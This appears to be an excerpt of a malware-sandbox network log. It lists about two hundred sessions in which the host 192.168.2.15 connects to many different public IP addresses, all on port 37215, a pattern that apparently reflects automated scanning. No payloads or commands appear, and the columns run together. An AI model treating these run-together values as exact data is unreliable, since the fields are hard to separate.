                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3648192.168.2.1537926197.169.54.25537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3649192.168.2.1536328157.180.152.11137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3650192.168.2.1559328197.160.16.24937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3651192.168.2.1554758197.251.54.7837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3652192.168.2.1545020197.9.24.13737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3653192.168.2.1547222197.253.207.21337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3654192.168.2.1552540145.210.95.15037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3655192.168.2.1540122157.181.161.8937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3656192.168.2.154075441.230.82.22537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3657192.168.2.154660236.190.30.3637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3658192.168.2.1550768188.77.171.10337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3659192.168.2.1547364197.29.197.15537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3660192.168.2.1541588157.255.82.24137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3661192.168.2.1557552156.84.89.23637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3662192.168.2.154791852.45.11.11037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3663192.168.2.1536516197.135.70.3937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3664192.168.2.155394441.210.164.19837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3665192.168.2.1543944157.189.92.1837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3666192.168.2.1559334157.142.193.2737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3667192.168.2.1559928197.60.68.19937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3668192.168.2.1550138157.138.152.13537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3669192.168.2.154901642.160.105.10537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3670192.168.2.1537230157.4.49.8637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3671192.168.2.155463041.197.36.25237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3672192.168.2.154951841.242.159.13837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3673192.168.2.153703441.148.251.16937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3674192.168.2.1557162157.136.105.8237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3675192.168.2.155695038.92.24.15837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3676192.168.2.155214841.207.246.16137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3677192.168.2.1558454157.136.240.13537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3678192.168.2.155425482.65.1.4437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3679192.168.2.1560980197.66.232.7037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3680192.168.2.1544194157.79.207.23537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3681192.168.2.1558490197.137.35.9137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3682192.168.2.1537492157.59.161.1637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3683192.168.2.1560612157.89.228.5237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3684192.168.2.154343041.56.223.24537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3685192.168.2.154140241.88.180.5637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3686192.168.2.1546166157.35.128.1037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3687192.168.2.155633641.244.214.3537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3688192.168.2.153293823.93.165.24037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3689192.168.2.1532938157.252.234.537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3690192.168.2.1537410197.77.205.15237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3691192.168.2.153411841.159.150.8137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3692192.168.2.154076041.128.232.10037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3693192.168.2.1559894113.200.46.10037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3694192.168.2.1560526157.175.62.2837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3695192.168.2.154311041.207.156.23937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3696192.168.2.1548328197.213.72.25137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3697192.168.2.1549600201.123.84.4537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3698192.168.2.1543510157.2.9.10737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3699192.168.2.154122499.133.168.2437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3700192.168.2.1559228157.147.22.16137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3701192.168.2.1545830197.177.234.15537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3702192.168.2.1538314197.4.193.25137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3703192.168.2.153435641.234.61.10637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3704192.168.2.1554708202.75.11.24537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3705192.168.2.1548296197.72.8.7637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3706192.168.2.153809082.237.0.4937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3707192.168.2.154268041.159.254.16637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3708192.168.2.1558978116.176.11.22437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3709192.168.2.155151841.35.173.21637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3710192.168.2.1555102157.46.61.12537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3711192.168.2.1552210157.209.55.25237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3712192.168.2.1556712157.48.210.15937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3713192.168.2.155262823.236.152.25037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3714192.168.2.1535510197.61.76.19737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3715192.168.2.153675441.230.234.1737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3716192.168.2.1534502117.107.46.23737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3717192.168.2.1557412177.24.122.3837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3718192.168.2.154709241.49.186.9837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3719192.168.2.1555410155.81.227.4237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3720192.168.2.154356641.74.190.16337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3721192.168.2.1542072197.102.34.17437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3722192.168.2.154800041.225.221.10537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3723192.168.2.1534088197.136.197.22437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3724192.168.2.154299841.174.82.22937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3725192.168.2.154097841.52.25.24637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3726192.168.2.153849641.6.210.18237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3727192.168.2.1556670197.82.158.9537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3728192.168.2.1552770197.16.37.12337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3729192.168.2.154576041.139.233.23237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3730192.168.2.1538998151.234.93.14837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3731192.168.2.1552920222.66.39.15437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3732192.168.2.1559394157.143.74.3037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3733192.168.2.1541214159.149.32.15137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3734192.168.2.1535334197.195.17.15237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3735192.168.2.1555390197.112.163.8637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3736192.168.2.153610441.246.146.21137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3737192.168.2.1549166157.99.44.21837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3738192.168.2.153679445.200.120.6837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3739192.168.2.1557142157.153.114.23237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3740192.168.2.1544690197.7.172.21237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3741192.168.2.153740041.168.126.11537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3742192.168.2.154949441.9.148.9337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3743192.168.2.155536841.71.163.337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3744192.168.2.1537096157.240.236.21237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3745192.168.2.1542778197.143.10.24737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3746192.168.2.1548092157.0.179.11937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3747192.168.2.1542678157.158.9.19937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3748192.168.2.1536822199.180.140.23437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3749192.168.2.1557308197.166.4.14137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3750192.168.2.1560276145.254.2.10037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3751192.168.2.153370441.58.65.22037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3752192.168.2.155475441.6.68.21437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3753192.168.2.154427641.198.229.537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3754192.168.2.153743465.182.48.13637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3755192.168.2.1534278197.129.28.15437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3756192.168.2.153776241.6.62.5837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3757192.168.2.155108641.118.104.23937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3758192.168.2.153640680.219.91.17737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3759192.168.2.1536082197.71.244.17437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3760192.168.2.154616241.50.146.7637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3761192.168.2.1548880197.45.129.15537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3762192.168.2.1544202202.113.28.10537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3763192.168.2.1532864197.39.93.7237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3764192.168.2.155681641.161.99.7637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3765192.168.2.155910241.171.22.22737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3766192.168.2.1534224157.51.36.4137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3767192.168.2.1557572197.143.92.537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3768192.168.2.154343680.251.10.10037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3769192.168.2.154358241.48.142.7737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3770192.168.2.1538072197.56.198.13637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3771192.168.2.1560906197.54.195.4037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3772192.168.2.154435089.247.214.23337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3773192.168.2.1538574197.20.237.9337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3774192.168.2.1552552157.141.109.1737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3775192.168.2.154654841.254.94.18237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3776192.168.2.155440887.34.169.3037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3777192.168.2.153343041.119.8.6237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3778192.168.2.154426041.14.192.13237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3779192.168.2.155229641.200.6.10837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3780192.168.2.1540282157.60.125.5637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3781192.168.2.154829241.249.233.16237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3782192.168.2.1533134157.172.26.1837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3783192.168.2.153375638.241.60.2537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3784192.168.2.1541550157.204.92.5537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3785192.168.2.1554708197.118.121.10937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3786192.168.2.1540836182.137.204.4637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3787192.168.2.1543776157.45.197.10537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3788192.168.2.1553558157.145.164.2937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3789192.168.2.1540236197.208.67.17837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3790192.168.2.155328645.45.227.15337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3791192.168.2.1557414197.183.221.18337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3792192.168.2.155691441.208.225.25337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3793192.168.2.154748641.49.186.9837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3794192.168.2.1553490197.218.96.21037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3795192.168.2.154432641.197.158.7237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3796192.168.2.154706441.165.185.037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3797192.168.2.1545432157.96.241.10837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3798192.168.2.1547950197.100.177.2337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3799192.168.2.154841041.226.197.21337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3800192.168.2.1547356157.5.30.13837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3801192.168.2.1560394157.104.3.12737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3802192.168.2.1556420197.91.156.12437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3803192.168.2.1546718157.25.68.11137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3804192.168.2.1547486197.129.255.637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3805192.168.2.1547810191.81.189.15137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3806192.168.2.1554834197.18.118.1837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3807192.168.2.153480641.51.102.18637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3808192.168.2.154486653.233.60.937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3809192.168.2.1554456197.126.148.3637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3810192.168.2.1538078138.121.28.3137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3811192.168.2.1560034197.192.4.19837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3812192.168.2.1558286197.16.228.17937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3813192.168.2.155430244.122.41.12237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3814192.168.2.1557090197.130.143.20537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3815192.168.2.1540502157.210.128.23437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3816192.168.2.1555550197.58.136.2637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3817192.168.2.155455818.112.168.23137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3818192.168.2.1554392157.88.25.437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3819192.168.2.154108639.61.224.10937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3820192.168.2.155888274.102.88.6137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3821192.168.2.1557778197.41.180.5337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3822192.168.2.153817441.66.110.4637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3823192.168.2.1546702157.125.53.8637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3824192.168.2.155347241.213.155.13037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3825192.168.2.1539858157.200.179.1037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3826192.168.2.1539062210.180.201.7437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3827192.168.2.1545262139.187.214.5137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3828192.168.2.153472841.34.27.23737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3829192.168.2.1539422136.231.148.12937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3830192.168.2.1536930134.183.179.5937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3831192.168.2.1552466133.48.191.9437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3832192.168.2.153399441.92.176.5637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3833192.168.2.153908041.51.21.13137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3834192.168.2.1541880197.111.219.6037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3835192.168.2.155144441.131.114.2937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3836192.168.2.1539020197.8.215.2337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3837192.168.2.1553778203.160.243.11437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3838192.168.2.154005441.87.160.11637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3839192.168.2.1536582178.245.152.737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3840192.168.2.1557660197.228.90.20737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3841192.168.2.153368641.132.197.9637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3842192.168.2.1544616130.176.230.13337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3843192.168.2.154817441.243.138.1637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3844192.168.2.155169041.180.163.22537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3845192.168.2.155586241.109.79.18637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3846192.168.2.1538554157.90.114.11637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3847192.168.2.154916441.220.47.22637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3848192.168.2.155864841.136.140.22937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3849192.168.2.1552270157.63.132.4737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3850192.168.2.153504041.229.137.19837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3851192.168.2.1542014180.3.183.13137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3852192.168.2.1559642157.237.197.3537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3853192.168.2.1541256157.35.157.20037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3854192.168.2.154216841.212.238.13137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3855192.168.2.155455439.2.217.237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3856192.168.2.1556514157.22.121.23537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
